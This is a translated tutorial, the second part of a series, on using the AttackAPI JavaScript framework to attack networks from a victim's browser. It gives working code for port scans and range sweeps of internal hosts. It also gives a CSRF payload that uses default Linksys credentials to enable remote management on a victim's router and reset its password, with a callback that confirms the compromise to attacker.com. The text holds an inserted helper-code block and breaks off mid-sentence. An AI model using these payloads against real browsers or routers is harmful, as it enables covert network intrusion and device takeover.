Proficient in the JavaScript attack framework: AttackAPI (II)

Source: Internet
Author: User

For years, client security did not receive enough attention, but the situation has now changed dramatically: client security has become one of the focal points of the information security field. Web malware, AJAX worms, browser history cracking, logon detection, zombie (puppet) control, network port scanning, browser hijacking and similar techniques are still only part of the underground laboratory work of security researchers, yet they have already had a huge impact.

When a class of security issue emerges and becomes a mainstream exploitation mechanism, vendors and individuals begin to release frameworks and automated tools to streamline the tooling and the testing process. Although vendors initially focused mainly on AJAX auditing tools, security researchers are more interested in continuously pushing system boundaries to find out what is really possible. Because of the many possible attack vectors, the web application security community has also built several frameworks to detect and exploit security vulnerabilities, thereby exposing the various problems the web development community faces.

In the previous article, we introduced how to set up the AttackAPI test environment and how to perform reconnaissance on the client. In this article, we introduce the other capabilities of AttackAPI in detail.

I. Attack Network

Extracting information from the client is only a small part of what attackers can do; client reconnaissance is merely the starting point of a premeditated attack. XSS attacks are not only about client security. Because the browser is a bridge between the insecure Internet and the LAN, attackers can exploit different browser features to locate and attack internal devices.

The following describes how an attack on the intranet can be launched with the help of AttackAPI. As with any planned network attack, we start with port scanning:

$A.scanPorts({
    target: 'www.gnucitizen.org',
    ports: [80, 81, 443],   // the three ports whose state is reported in Figure 1
    onfound: function (port) {
        console.log(port);
    },
    oncompleted: function () {
        console.log('completed!');
    }
});

(Figure 1: port scan result displayed in the browser)

The port scan result is displayed in our browser. You can see that the browser correctly identifies that port 80 is open while ports 81 and 443 are closed.

Port scanning from a browser is not very accurate, so you may receive many false positives. To reduce them, tune the scanning process with the timeout parameter, as shown below:

$A.scanPorts({
    target: 'www.gnucitizen.org',
    ports: [80, 81, 443],
    timeout: 2000,   // try a couple of values to get better results
    onfound: function (port) {
        console.log(port);
    },
    oncompleted: function () {
        console.log('completed!');
    }
});

Now that we know how to perform port scanning, the open ports of an enterprise printer could be identified with something similar to the following:

$A.scanPorts({
    target: '10.10.128.54',   // address of the internal printer
    ports: [80, 81, 443, 9100],
    onfound: function (port) {
        console.log(port);
    },
    oncompleted: function () {
        console.log('completed!');
    }
});

The timeout parameter defines how long the port scanner waits for a response from the port currently being tested; once that period elapses, the port is marked as closed. If the victim reaches internal web resources through a proxy, the scanning process fails, but this setup is rare.

Note: Firefox and Opera cannot scan ports lower than 80. This is a security feature implemented by these two browsers; IE has no such restriction. AttackAPI can also scan ports across a network range, a technique commonly referred to as carpet port scanning, which is exposed through AttackAPI's sweepPorts function. The following code demonstrates the capabilities of sweepPorts:

$A.sweepPorts({
    network: '212.211.193.100-212.211.193.110',
    onfound: function (port) {
        console.log(port);
    },
    oncompleted: function () {
        console.log('completed!');
    }
});

If everything works, you will see the result shown in Figure 2.

(Figure 2: sweepPorts result displayed in the browser)

AttackAPI supports two notations for an address range: "starting IP address-ending IP address", and IP/MASK, i.e. classless inter-domain routing (CIDR) notation. For example, you can use the following code to scan the class C address range of 11.11.66.0:

$A.sweepPorts({
    network: '10.10.56.0/24',
    onfound: function (port) {
        console.log(port);
    },
    oncompleted: function () {
        console.log('completed!');
    }
});

To manipulate network and IP address values, you can use several AttackAPI utilities. Their names and usage are as follows:

var num = $A.ip2number('10.10.56.10');     // convert IP to number
console.log(num);
var ip = $A.number2ip(num);                // 168441866 converts back to 10.10.56.10
console.log(ip);
var range = $A.net2range('10.10.56.0/24'); // convert network to range
console.dir(range);
var net = $A.range2net(range);             // the reverse conversion
console.log(net);
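To make the four address helpers concrete, here is a stand-alone reimplementation of ip2number, number2ip, net2range and range2net that accepts both of the range notations described above (CIDR and "start-end"). This is an added example, not AttackAPI's own code: the {start, end} shape returned by net2range, the rejection of malformed octets and prefixes, and the fall-back of range2net to "start-end" for a range that is not one aligned CIDR block are assumptions made here. Arithmetic uses multiplication and division rather than bit shifts so that addresses above 127.255.255.255 do not overflow JavaScript's signed 32-bit bitwise operators.

```javascript
// Added example: IPv4 address helpers in the style of the AttackAPI utilities.
// Not AttackAPI code; return shapes and validation rules are assumptions.

// '10.10.56.10' -> 168441866. Throws on anything that is not a dotted quad.
function ip2number(ip) {
  const parts = String(ip).trim().split('.');
  if (parts.length !== 4) throw new Error('invalid IPv4 address: ' + ip);
  return parts.reduce((acc, p) => {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) throw new Error('invalid octet: ' + p);
    return acc * 256 + Number(p);          // no '<<': avoids signed 32-bit overflow
  }, 0);
}

// 168441866 -> '10.10.56.10'. Throws if the value is not a 32-bit unsigned integer.
function number2ip(num) {
  if (!Number.isInteger(num) || num < 0 || num > 0xFFFFFFFF) throw new Error('out of range: ' + num);
  return [24, 16, 8, 0].map(shift => Math.floor(num / 2 ** shift) % 256).join('.');
}

// Accepts 'a.b.c.d/prefix' or 'a.b.c.d-e.f.g.h' and returns { start, end } (assumed shape).
// A CIDR base that is not on a block boundary is aligned down to the block start.
function net2range(net) {
  const cidr = String(net).match(/^\s*([\d.]+)\/(\d{1,2})\s*$/);
  if (cidr) {
    const prefix = Number(cidr[2]);
    if (prefix > 32) throw new Error('invalid prefix length: ' + prefix);
    const size = 2 ** (32 - prefix);
    const base = ip2number(cidr[1]);
    const start = base - (base % size);
    return { start: number2ip(start), end: number2ip(start + size - 1) };
  }
  const dash = String(net).match(/^\s*([\d.]+)\s*-\s*([\d.]+)\s*$/);
  if (dash) {
    const s = ip2number(dash[1]);
    const e = ip2number(dash[2]);
    if (s > e) throw new Error('range start is after range end: ' + net);
    return { start: number2ip(s), end: number2ip(e) };
  }
  throw new Error('unrecognised network notation: ' + net);
}

// Reverse of net2range: returns CIDR when the range is exactly one aligned block,
// otherwise falls back to the 'start-end' notation (assumed behaviour).
function range2net(range) {
  const s = ip2number(range.start);
  const e = ip2number(range.end);
  if (s > e) throw new Error('range start is after range end');
  const size = e - s + 1;
  let block = 1;
  let prefix = 32;
  while (block < size) { block *= 2; prefix -= 1; }   // smallest power of two >= size
  if (block === size && s % size === 0) return number2ip(s) + '/' + prefix;
  return range.start + '-' + range.end;
}

// Usage (mirrors the sequence in the article):
console.log(ip2number('10.10.56.10'));              // 168441866
console.log(number2ip(168441866));                  // 10.10.56.10
console.log(net2range('10.10.56.0/24'));            // { start: '10.10.56.0', end: '10.10.56.255' }
console.log(range2net(net2range('10.10.56.0/24'))); // 10.10.56.0/24
```

The validation matters more than it looks: a sweep driven by an unchecked string such as '10.10.56.300' would silently produce a nonsensical range, so each helper rejects malformed input instead of wrapping around.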

Although identifying open ports and operating systems is important, we can do more than that: for example, a single function call can launch an attack on an internal router.

Many devices on a network can serve as a way in, and the first is the well-known default gateway. If you are a wireless user, that is your wireless router. To make configuration and security settings convenient, its management interface can sometimes be reached over the Internet. The following is a way an attacker can quietly accomplish this, as long as the victim visits a malicious web page:

$A.requestCSRF({
    method: 'post',
    url: 'http://admin:admin@' + $A.getInternalIP().replace(/\.\d+$/, '.1') + '/setup.cgi',
    query: {
        remote_management: 'enable',
        sysPasswd: 'abc123',
        sysConfirmPasswd: 'abc123'
    }
});

First, we call the requestCSRF function, one of the many request functions of AttackAPI, which can be used to retrieve or invoke remote resources. Unlike requestXML (which only works for resources of the same origin), requestCSRF has no such restriction, but its response is always opaque to the caller: we cannot read what is returned.

The requestCSRF function takes several parameters. The first defines the sending method, here POST. The next defines the URL to which the payload is sent. Note that we read the client's local IP address and turn it into the default gateway address with the replace call shown above; then we add the router's default credentials.

Wireless users often leave their routers with the default access settings. At the end of the requestCSRF call, we declare the actual payload to be sent: the query parameter. From the query list we can see that the remote management interface is enabled and the system password is set to "abc123".

Note: this call uses the default credentials of Linksys wireless routers. If the router has different credentials configured, it presents a basic-authentication dialog to the victim, indicating that authentication is required before the request is accepted. Remember that the victim does not know what is happening in the background; it merely looks as though the connection has dropped and the router is trying to regain control (which is often the case), and that is why the victim is willing to type in their credentials and approve the malicious request.

The attack is invisible to the user throughout. If authentication succeeds, port 8080 is opened so that the management interface can be used over the Internet. At that point the router at the network border, and every machine behind it, has fallen completely into the attacker's hands.

The attacker may also want a confirmation indicating that the user's router has been compromised, as shown below:

$A.requestCSRF({
    method: 'post',
    url: 'http://admin:admin@' + $A.getInternalIP().replace(/\.\d+$/, '.1') + '/setup.cgi',
    query: {
        remote_management: 'enable',
        sysPasswd: 'abc123',
        sysConfirmPasswd: 'abc123'
    },
    onload: function () {
        $A.requestIMG('http://attacker.com/confirm_compromised.php');
    }
});

This is a real attack and it will do damage to a Linksys wireless router. Once attackers are inside your network they can do other things, such as identifying different local devices and collecting as much information as possible. Users should therefore not trust JavaScript code from arbitrary pages, and should be aware of the potential problems of browsing without protection.

In the previous section, we showed that logged-on users can be found with the scanStates function, but this function has many other uses. Because scanStates is signature based, it can be used to detect the types and versions of different network devices. The signatures rely on the error messages a script tag produces when a remote resource is loaded: for example, the error caused by a non-existent resource differs from that caused by an existing one. Given a large enough signature database, the types and versions of different network devices and enterprise websites can be identified. An attacker could thereby identify the versions of key systems on your organisation's intranet, and if some of them have XSS or CSRF vulnerabilities, launch targeted attacks to gain persistent or non-persistent control over the victim's sessions.

The browser is the communication platform between two worlds, the hostile Internet and the trusted local network, which makes it an ideal platform for an attacker to cross from one into the other. In the following sections we show how simple it is to get into someone's router, and how easily attackers can damage network integrity by taking control of other devices.

II. Hijacking Browsers

There are two main types of XSS attacks: persistent and non-persistent attacks. Persistent attacks are more dangerous because they occur every time users access infected resources. This means that attackers can
